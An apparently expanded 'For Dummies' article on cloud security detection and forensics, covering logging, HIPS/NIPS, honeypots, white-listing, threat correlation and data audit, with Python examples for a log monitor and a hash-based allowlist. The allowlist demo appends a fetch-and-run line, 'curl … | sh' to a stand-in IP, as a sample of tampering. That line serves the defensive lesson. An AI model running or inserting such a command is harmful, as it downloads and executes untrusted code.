Detection and Forensics in Cloud Computing - dummies

By Judith Hurwitz, Robin Bloor, Marcia Kaufman, Fern Halper

Cloud computing service providers each manage security in their own way, so a customer needs its own view of what is actually happening to its systems and data. Three groups of IT security products supply that view: activity logs, host-based and network-based intrusion protection systems (HIPS and NIPS), and data audit.

Activity logs as cloud computing security

Operating systems, applications, databases, and devices such as hardware firewalls and network monitors all include logging capabilities. Logging is not free: turning it on means the system writes log records constantly, and the records then have to be stored, protected, and archived until they are no longer needed. In a cloud deployment you also need to settle up front which logs the provider keeps, for how long, and whether you can export them, because evidence you cannot retrieve when you need it is no evidence at all.

Log files, however, often provide the only evidence of how a fraud was carried out. Perpetrators of digital fraud frequently escape justice simply because the victim cannot produce sufficient evidence of what they did.

HIPS and NIPS as cloud computing security

Companies that want a cloud service provider to take over their platform and infrastructure services need to look carefully at how that infrastructure is protected.

Host-based intrusion protection systems (HIPS) and network-based intrusion protection systems (NIPS) are two halves of the same idea: a collection of capabilities that make a network hard to penetrate. A HIPS runs on an individual server and watches what happens on it (processes, files, accounts, local logs); a NIPS sits in the traffic path and watches what crosses the network. Neither replaces the other.

HIPS and NIPS can include the following elements:

  • System and log-file monitors: This software looks for traces of attackers in log files. The monitors can watch login accounts, for example, and raise an alert when account permissions change, often a sign that something untoward is going on. For such alerts to be trustworthy, logs must be shipped off the host promptly: an attacker who gains administrative rights on a machine can edit or delete the log files stored on it.

  • Network intrusion-detection systems (NIDS): These programs inspect the packets that travel through a network, looking for telltale signs of attacker activity. The effectiveness of a NIDS depends on whether it can separate genuine attacks from benign anomalies and legitimate traffic. An ineffective NIDS raises too many false alarms and so wastes analysts' time, until the alarms are ignored altogether. In a public cloud you cannot plug a sensor into the provider's switches, so a NIDS there depends on whatever traffic mirroring or flow logging the provider offers.

  • Digital deception software: This software deliberately misleads anyone attempting to attack the network. It can range from simply disguising the names and versions that services announce about themselves to setting up traps known as honeypots or honeynets. Because no legitimate user has any reason to touch a honeypot, any contact with one is a high-fidelity alert.

    Setting such traps is unusual and can be expensive. It is normally done by government sites or by companies that suspect industrial espionage.

  • White-listing software: This software inventories the executable programs that are permitted to run on a computer and prevents any other executable from running. White-listing severely hampers attackers: even if they get onto a computer, they cannot upload their own programs and run them. It also reports every attempt to run an unapproved program, and it stops conventional malware dead, because the malware's executable is not on the list. The caveat is that an attacker can still abuse programs that are on the list, such as scripting interpreters and administrative tools, so the list should be as short as the job allows and should identify programs by a hash of their contents rather than by name or path.

  • Unified threat management: This central function takes the output of all the preceding components and identifies threats by analyzing the combined information, so that, for example, a burst of failed logins followed by a permission change on the same host is reported as one incident rather than as two unrelated alerts.
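The two monitoring items above (the log-file monitor that watches account permissions, and the unified threat management layer that correlates alerts) can be shown end to end with a small amount of code. The following is an added example written for this page, not code from the authors or from any product; it runs over constructed auth-log style lines (the hosts, users and addresses are made up) and the thresholds and severity numbers are arbitrary choices for illustration.

```python
"""Minimal host log monitor plus a UTM-style correlation step.

Detects brute-force login bursts, a successful login that follows such a
burst, and additions to privileged groups, then combines the alerts per
host into one verdict.  Log format and all values are constructed for
this example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in the style of a Linux auth.log (not real data).
SAMPLE_LOG = """\
Mar 10 08:01:02 web1 sshd[2210]: Failed password for admin from 203.0.113.5 port 51122 ssh2
Mar 10 08:01:04 web1 sshd[2210]: Failed password for admin from 203.0.113.5 port 51123 ssh2
Mar 10 08:01:05 web1 sshd[2210]: Failed password for admin from 203.0.113.5 port 51124 ssh2
Mar 10 08:01:07 web1 sshd[2210]: Failed password for admin from 203.0.113.5 port 51125 ssh2
Mar 10 08:01:09 web1 sshd[2211]: Accepted password for admin from 203.0.113.5 port 51126 ssh2
Mar 10 08:02:30 web1 usermod[2250]: add 'admin' to group 'sudo'
Mar 10 09:15:00 db1 sshd[990]: Accepted publickey for deploy from 10.0.0.7 port 40000 ssh2
"""

PRIVILEGED_GROUPS = {"sudo", "wheel", "admin", "root"}   # assumption: what counts as privileged

TS = r"(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) "
FAILED = re.compile(TS + r"sshd\[\d+\]: Failed password for (?P<user>\S+) from (?P<ip>\S+)")
ACCEPTED = re.compile(TS + r"sshd\[\d+\]: Accepted \w+ for (?P<user>\S+) from (?P<ip>\S+)")
GROUP_ADD = re.compile(TS + r"usermod\[\d+\]: add '(?P<user>[^']+)' to group '(?P<group>[^']+)'")


def _when(m):
    # Syslog timestamps carry no year; 1900 is fine for interval arithmetic.
    return datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")


def analyze(log_text, threshold=3, window=timedelta(seconds=60)):
    """Return a list of alert dicts (host, kind, severity, detail) in log order."""
    alerts = []
    failures = defaultdict(list)   # (host, ip, user) -> timestamps of recent failures
    burst_keys = set()             # keys that already tripped the threshold

    for line in log_text.splitlines():
        if m := FAILED.match(line):
            key = (m["host"], m["ip"], m["user"])
            t = _when(m)
            # Keep only failures inside the sliding window, then add this one.
            recent = [x for x in failures[key] if t - x <= window] + [t]
            failures[key] = recent
            if len(recent) >= threshold and key not in burst_keys:
                burst_keys.add(key)
                alerts.append({"host": m["host"], "kind": "login_burst", "severity": 2,
                               "detail": f"{len(recent)} failed logins for {m['user']} from {m['ip']}"})
        elif m := ACCEPTED.match(line):
            key = (m["host"], m["ip"], m["user"])
            if key in burst_keys:   # the guessing stopped because a guess worked
                alerts.append({"host": m["host"], "kind": "login_after_burst", "severity": 4,
                               "detail": f"successful login for {m['user']} from {m['ip']} after failures"})
        elif m := GROUP_ADD.match(line):
            if m["group"] in PRIVILEGED_GROUPS:   # the permission change the text warns about
                alerts.append({"host": m["host"], "kind": "privilege_change", "severity": 3,
                               "detail": f"{m['user']} added to group {m['group']}"})
    return alerts


def correlate(alerts):
    """UTM-style step: fold per-host alerts into one risk score and verdict."""
    per_host = defaultdict(lambda: {"score": 0, "kinds": set()})
    for a in alerts:
        per_host[a["host"]]["score"] += a["severity"]
        per_host[a["host"]]["kinds"].add(a["kind"])
    verdicts = {}
    for host, info in per_host.items():
        if {"login_after_burst", "privilege_change"} <= info["kinds"]:
            verdict = "likely_compromise"      # the two signals together tell one story
        elif info["score"] >= 4:
            verdict = "investigate"
        else:
            verdict = "monitor"
        verdicts[host] = {"score": info["score"], "verdict": verdict}
    return verdicts


if __name__ == "__main__":
    found = analyze(SAMPLE_LOG)
    for a in found:
        print(f"[{a['host']}] {a['kind']} (sev {a['severity']}): {a['detail']}")
    print(correlate(found))
```

Run on the sample, the monitor raises three alerts for web1 and none for db1, and the correlation step turns the three into a single "likely_compromise" verdict for web1; the same three alerts viewed in isolation would each look like routine noise.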
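The white-listing item above says the list should key on what a program is rather than what it is called. This added example (written for this page, not code from the authors or from any white-listing product) shows the decision logic only: a real HIPS enforces the decision inside the operating system, but the check itself is the same. The file names and contents are constructed.

```python
"""Hash-based execution allowlist: a program may run only if the SHA-256 of
its bytes is on the list; anything else is refused and the attempt recorded.
"""
import hashlib
import os
import tempfile


def sha256_of(path):
    """Hash a file's contents in chunks so large binaries do not sit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


class Allowlist:
    def __init__(self):
        self.hashes = {}    # sha256 hex digest -> human-readable label
        self.attempts = []  # every decision made, allowed or refused

    def approve(self, path, label=None):
        """Add a known-good program to the list, keyed by its content hash."""
        self.hashes[sha256_of(path)] = label or os.path.basename(path)

    def check(self, path):
        """Decide whether `path` may execute; record the attempt either way."""
        digest = sha256_of(path)
        allowed = digest in self.hashes
        self.attempts.append({"path": path, "sha256": digest, "allowed": allowed})
        return allowed

    def violations(self):
        """What the text calls 'reporting on unapproved software'."""
        return [a for a in self.attempts if not a["allowed"]]


def demo():
    """Approve one script, then test a renamed copy and a tampered copy.

    Returns (good_allowed, renamed_allowed, tampered_allowed, violation_count).
    All files are constructed in a temporary directory for this example.
    """
    with tempfile.TemporaryDirectory() as d:
        good = os.path.join(d, "backup.sh")
        with open(good, "wb") as f:
            f.write(b"#!/bin/sh\ntar czf /backup/data.tgz /data\n")
        al = Allowlist()
        al.approve(good)

        # Same bytes under a different name: allowed, because the key is content.
        with open(good, "rb") as src:
            data = src.read()
        renamed = os.path.join(d, "totally-legit.sh")
        with open(renamed, "wb") as f:
            f.write(data)

        # Same name and path basename, one extra line: refused and recorded.
        tampered_dir = os.path.join(d, "tmp")
        os.mkdir(tampered_dir)
        tampered = os.path.join(tampered_dir, "backup.sh")
        with open(tampered, "wb") as f:
            f.write(data + b"curl http://198.51.100.9/x | sh\n")

        return (al.check(good), al.check(renamed), al.check(tampered),
                len(al.violations()))


if __name__ == "__main__":
    print(demo())
```

The renamed copy passes and the tampered copy fails, which is the point of hashing contents: an attacker who overwrites a trusted program with a modified version gets no benefit from keeping the trusted name. What this cannot do is stop misuse of programs that are legitimately on the list, which is why the list should be kept short.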

Data audit as cloud computing security

Databases routinely record who changed a piece of data, but they normally do not record who read it. Yet data that is merely read is easily stolen: a copy of a customer table does as much damage as a change to it and is far harder to notice. If you plan to store data in a cloud environment, you must address this, either by switching on the database's own audit facility for reads (at a cost in performance and log volume) or by recording reads in the application layer that issues the queries.